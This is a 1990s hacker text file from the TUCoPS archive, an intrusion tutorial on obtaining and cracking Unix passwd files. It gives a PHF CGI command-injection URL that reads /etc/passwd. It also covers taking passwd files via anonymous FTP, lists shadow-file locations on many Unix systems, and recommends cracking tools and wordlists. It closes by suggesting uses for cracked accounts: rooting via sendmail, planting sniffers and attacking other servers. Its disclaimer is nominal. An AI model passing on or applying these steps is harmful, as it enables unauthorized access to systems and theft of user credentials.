TUCoPS :: Password Security :: ugpasswd.txt

The Ultimate Guide to passwd files


            [***The Ultimate Guide Passwd Files***]
                         By Goat
 
    CONTENTS
  1. Introduction
  2. What is a Passwd File?
  3. PHF Exploit
  4. FTP Passwd
  5. Shadowed Passwds
  6. Crackers
  7. Wordlists
  8. Using Cracked Passwds
________________________________________________________

  1. Introduction

Passwd files are the easist and simplist ways to hack. This text will
explain what they are, how to get them, how to crack them, what tools you
will need, and what you can do with them. Of course the minute you sign on
the account you just happened to crack because of this file, you are
breaking the law. This text is for information, not illegal activites. If
you choose to do illegal activies with the information from this it is no
one's fault but your own. Now down to the good stuff [=.

________________________________________________________

  2. What is a Passwd File
  
A passwd file is an encrypted file that contains the users on a servers
passwords. The key word here is encrypted, so don't start thinking all i
have to do is find one and i hit the jackpot. Nope sorry Man, theres alot
more to it than that. The passwd file should look something like this

root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc


         
Out of that entire section the only name you could use would be
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc

Heres how you read the File
                  
 rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc
 Username: rcc                                           
 Encrypted Password: uXDg04UkZgWOQ                             
 User number: 201                                            
 Group Number: 4                                              
 Real Name (usually): Richard Clark                             
 Home Directory: /export/home/rrc
 Type of Shell: /bin/ksh    

Because it is the only name with an encrypted password. You will never find
a passwd file that has a passwd for anything like ftp, listen, bin,  etc.,
etc. Occasionally using the PHF exploit or unshadowing a passwd file you
can get an encrypted password for root.

________________________________________________________

 
3. PHF Exploit
  
First let me explain what an exploit is. An Exploit is a hole in software
that allows someone to get something out of it that... Well you aren't
supposed to.

The PHF exploit is a hole in CGI, that most servers have fixed now (if they
have CGI). Lets just say a very popular IRC place has a problem with their
CGI. Also on the subject of servers with the exploit open, many forien
servers have this open. Unlike the FTP Passwd you don't even have to access
their FTP or login. What you do is get a WWW browser and then in the plass
for the WWW address type:

http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd

In www.target.com Place who's passwd you want to get. If you get a message
like "The requested object does not exist on this server. The link you
followed is either outdated, inaccurate, or the server has been instructed
not to let you have it." its not there. If you get "You have been caught on
Candid Camera!" They caught you, but don't fear they rarly ever Report you.
I have yet to find a server that does report. Of course if you get
"root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing 
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"

You have hit the jackpot [=. Save the file as a text and keep it handy,
because you will need it for later in the lesson. 

________________________________________________________________

 4. FTP Passwd

The Passwd file on some systems is kept on FTP, which can pretty much be
accessed by anyone, unless the FTP has a non-anonymous logins rule. If you
are desprite to get a passwd file from a certain server (which may not even
be open, so only do if you are desprite or you want to hack your own
server) get an account that allows you access to their FTP. What you do is
get an FTP client such as WS FTP or CuteFTP. Find the servers name and
connect to it. You should get a list of Directories like "etc, hidden,
incoming, pub" goto the one called etc. inside etc should be a few files
like "group, passwd" if any chance you see one called shadow there is a
8/10 chance you are about to deal with a shadowed passwd. Well get the
passwd file and maybe check out what else is on the server so it won't look
so suspious. Anyway when you log out, run and check out your new passwd
file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin"
with * beside their names where the encrypted pas swd should be, you got a
passwd file that you cannot crack. But if it happens to have user names
(like rcc:*: or ggills:*:" with a * (or another symbol) you have a shadowed
passwd. Of course if you have been reading and paying attention if you have
something that has a few things that look like:

"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"

You have gotten one you can crack [=. 
________________________________________________________________
 
  5. Shadowed Passwd's
 
Now if you happen to find a passwd fiel that looks something like this:
"joetest:*:102:100::/home/joetest:/usr/bin/restsh" which has a user name,
not a programs, you have a shadowed passwd. The shadow file has the
encrypted passwords on it. Depending on the Operating System, the passwd
file may be in different places. To find out what Operating system your
target is running from telnet (connected to that server of course) type
uname -a and it should say, if you cannot get to telnet there is other
methods of finding out. Here is a guide to systems passwd file locations
(taken from a text on passwd files by Kryto.)  A token is the * (or other
symbol) beside a shadowed passwds user name

UNIX Paths (Courtesy of 2600)                                             
                                                                           
  UNIX                  Path                            Token              
 ----------------------------------------------------------------         
  AIX 3                /etc/security/passwd             !       
  or                  /tcb/auth/files/<first letter     #       
  A/UX 3.0s            /tcb/files/auth/?/               *         BSD4.3-Reno          /etc/master.passwd               *         ConvexOS 10           /etc/shadpw                     *         ConvexOS 11           /etc/shadow                     *         DG/UX                 /etc/tcb/aa/user/               *         EP/IX                 /etc/shadow                     x         HP-UX                 /.secure/etc/passwd             *         IRIX 5                /etc/shadow                     x         Linux 1.1             /etc/shadow                     *         OSF/1                 /etc/passwd[.dir|.pag]          *         SCO Unix #.2.x   /tcb/auth/files/<first letter of username> /<username>                                             *         SunOS4.1+c2        /etc/security/passwd.adjunct ##username      SunOS 5.0             /etc/shadow                              <optional NIS+ private secure maps/tables/whatever  
  System V Release 4.0  /etc/shadow                     x         System V Release 4.2  /etc/security/* database               
  Ultrix 4              /etc/auth[.dir|.pag]            *      
  UNICOS                /etc/udb                        *                                                                         Anyway once you have the passwd file (with user names) and shadow file you can find a unshadowing program which combines the passwd file and the shadow passwd and combines them into what a regualr passwd file would be. A unshadowing program can be found at http://www.hackersclub.com/km/downloads/password_cracker/ucfjohn2.zip Now some servers have the shadow file on retrictions so no one without a special account on the server can get to it. 
________________________________________________________________

  6. Crackers

Now that you have gotten a passwd file, what the hell do you do it it to
get passwords from it? Thats where crackers come in.

A cracker takes the passwd file and a wordlist and compares the wordlist to
the passwd files encrypted passwd. I have used many different crackers.
Everyone has their favorite. My personal favorite is one called PaceCrack95
Ver. 1.1 

http://tms.netrom.com/~cassidy/utils/pacec.zip

Many people swear that John the Ripper is the greatest but i have problems
with it, but it can be gotten off any decent hacking page. Same for Cracker
Jack. A Cracker will load a wordlist and a passwd file and compare the two.
When it cracks a password it will tell you the user name and the
unencrypted password. You don't need to write it down because the program
auto saves it. Cracker Jack saves the file as jack.pot and i think John the
Ripper does too. PaceCrack95 Ver. 1.1 saves it to the files name (ex.,
passwd.txt.db) with the exact name and makes it a .DB file. I like to keep
a passwd file once i have cracked it and later try out a new passwd cracker
on it with the same wordlist and see if it works or if it is fake. It helps
[=.
___________________________________________________________________________

  7. Wordlists 

Wordlists are a nessicity to cracking passwd files. They are just huge
lists of words. The biggest wordlist is avaliable from here:
ftp://ftp.ox.ac.uk/pub/wordlists/

If you get a passwd file from another contry get a wordlist with the same
launguage as the worlist came from, as the users would probably use words
they are familier with [=. There are some programs which can make random
numbers to what you specify but that might not be really great, since there
is such a huge amount of number combinations they could use. I am not
completly saying they are useless since i have cracked a password with one
before, I had fashoned my own list of 4 digit numbers since people might
use their phone number and well it worked [=.
____________________________________________________________________________

  8. What to do with a Cracked Passwd file

What you can do with a passwd is up to you. The nice thing to do is
inform the administator of the server that, accounts on his (or her) server
are insucure and possibly open to anyone hacking an account and bringing
havok upon their server. Some other things you can do is fire up good ole
telnet and connect to one of their ports and see what you could do with
that account. The possiblities are endless. You could hack a webpage (i
wouldn't do that on account of how lame it is to destruct someones piece of
work.)

You could use an exploit in sendmail and get root or install a sniffer
on the system and get all the passwords you could ever want from it. You
could use the account to do work on OTHER servers that you sure as hell
wouldn't want to do from your own. If your account is canceled you can use
a hacked accounts dial up till you purchase a new one. Like I said the list
goes on and on. I am sure noone wants you doing anything destuctive (its
lame anyhow.) And the best thing to do is report the problem to the system
admin so, if he finds out he won't freak and call your admin and tell him
you have been doing naughty things or even call the cops. I hope this text
was informative enough to fufill your needs [=. Goat


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH